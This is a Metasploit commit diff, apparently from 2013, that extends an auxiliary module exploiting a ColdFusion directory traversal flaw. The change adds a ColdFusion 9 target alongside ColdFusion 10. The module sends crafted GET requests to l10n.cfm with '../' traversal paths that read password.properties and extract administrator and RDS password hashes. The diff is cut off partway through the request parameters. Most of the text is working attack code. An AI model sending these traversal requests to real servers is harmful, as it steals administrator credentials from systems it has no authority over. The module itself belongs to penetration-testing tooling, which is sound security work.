Add Coldfusion 9 target, OSVDB ref and review

unstable
jvazquez-r7 2013-05-13 11:55:11 -05:00
parent 60299c2adb
commit 5b64379553
1 changed files with 22 additions and 4 deletions

View File

@ -14,14 +14,17 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => "ColdFusion 10 'password.properties' Hash Extraction", 'Name' => "ColdFusion 'password.properties' Hash Extraction",
'Description' => %q{ 'Description' => %q{
This module uses a directory traversal vulnerability to extract information This module uses a directory traversal vulnerability to extract information
such as password, rdspassword, and "encrypted" properties. such as password, rdspassword, and "encrypted" properties. This module has been
tested successfully on ColdFusion 9 and ColdFusion 10. Use actions to select the
target ColdFusion version.
}, },
'References' => 'References' =>
[ [
[ 'EDB', '25305' ], [ 'OSVDB', '93114' ],
[ 'EDB', '25305' ]
], ],
'Author' => 'Author' =>
[ [
@ -29,11 +32,18 @@ class Metasploit3 < Msf::Auxiliary
'sinn3r' 'sinn3r'
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Actions' =>
[
['ColdFusion10'],
['ColdFusion9']
],
'DefaultAction' => 'ColdFusion 10',
'DisclosureDate' => "May 7 2013" #The day we saw the subzero poc 'DisclosureDate' => "May 7 2013" #The day we saw the subzero poc
)) ))
register_options( register_options(
[ [
Opt::RPORT(8500),
OptString.new("TARGETURI", [true, 'Base path to ColdFusion', '/']) OptString.new("TARGETURI", [true, 'Base path to ColdFusion', '/'])
], self.class) ], self.class)
end end
@ -43,6 +53,14 @@ class Metasploit3 < Msf::Auxiliary
end end
def run def run
filename = ""
case action.name
when 'ColdFusion10'
filename = "../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties"
when 'ColdFusion9'
filename = "../../../../../../../../../../../../../../../opt/coldfusion9/lib/password.properties"
end
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', 'customtags', 'l10n.cfm'), 'uri' => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', 'customtags', 'l10n.cfm'),
@ -51,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
'vars_get' => { 'vars_get' => {
'attributes.id' => 'it', 'attributes.id' => 'it',
'attributes.file' => '../../administrator/mail/download.cfm', 'attributes.file' => '../../administrator/mail/download.cfm',
'filename' => '../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties', 'filename' => filename,
'attributes.locale' => 'it', 'attributes.locale' => 'it',
'attributes.var' => 'it', 'attributes.var' => 'it',
'attributes.jscript' => 'false', 'attributes.jscript' => 'false',